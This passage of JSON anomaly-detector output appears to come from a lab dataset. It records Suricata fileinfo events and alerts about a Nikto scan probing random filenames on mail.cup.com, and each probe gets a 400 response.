combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.Htm", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.345637+0000\",\"flow_id\":1697602987508313,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46940,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.Htm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.Htm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.345637, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1697602987508313,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46940,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.Htm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.Htm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": 
"fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46940,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.Htm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.Htm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.Htm\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.Htm\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.Htm", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", 
"/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.Htm", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46940,\"proto\":\"TCP\"", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46940, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1697602987508313,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1697602987508313, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.345637+0000\",\"flow_id\":1697602987508313,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46940,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.Htm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.Htm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, 
"AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.347250 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46942 -> 192.168.10.154:80", "/parser/model/time": 1583349514.34725, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46942, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.347250 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46942 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value 
combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.csc", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.347570+0000\",\"flow_id\":1217064866564597,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46942,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.csc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.csc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.34757, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1217064866564597,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46942,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.csc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.csc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": 
"fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46942,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.csc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.csc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.csc\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.csc\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.csc", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", 
"/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.csc", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46942,\"proto\":\"TCP\"", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46942, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1217064866564597,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1217064866564597, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.347570+0000\",\"flow_id\":1217064866564597,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46942,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.csc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.csc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, 
"AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.349169 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46944 -> 192.168.10.154:80", "/parser/model/time": 1583349514.349169, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46944, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.349169 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46944 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value 
combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.el", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.349508+0000\",\"flow_id\":883960087990575,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46944,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.el\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.el\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.349508, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":883960087990575,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46944,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.el\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.el\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": 
"fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46944,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.el\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.el\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.el\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.el\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.el", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", 
"/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.el", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46944,\"proto\":\"TCP\"", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46944, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":883960087990575,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 883960087990575, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.349508+0000\",\"flow_id\":883960087990575,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46944,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.el\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.el\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, 
